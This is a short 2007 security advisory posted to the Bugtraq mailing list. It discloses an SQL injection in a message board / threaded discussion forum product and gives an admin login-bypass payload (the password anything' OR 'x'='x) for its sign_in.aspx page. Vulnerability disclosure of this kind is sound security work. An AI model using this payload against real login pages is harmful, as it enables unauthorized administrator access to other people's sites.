
Date: 28 Jul 2007 00:00:31 -0000
From: Advisory@...a-security.net
To: bugtraq@...urityfocus.com
Subject: Message Board / Threaded Discussion Forum SQL INJECTION

__________________________

A R I A - S E C U R I T Y
_________________________

Message Board / Threaded Discussion Forum SQL INJECTION
Vendor: http://www.codewidgets.com

http://target.com/PATH/sign_in.aspx

Username: admin
Password: anything' OR 'x'='x

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
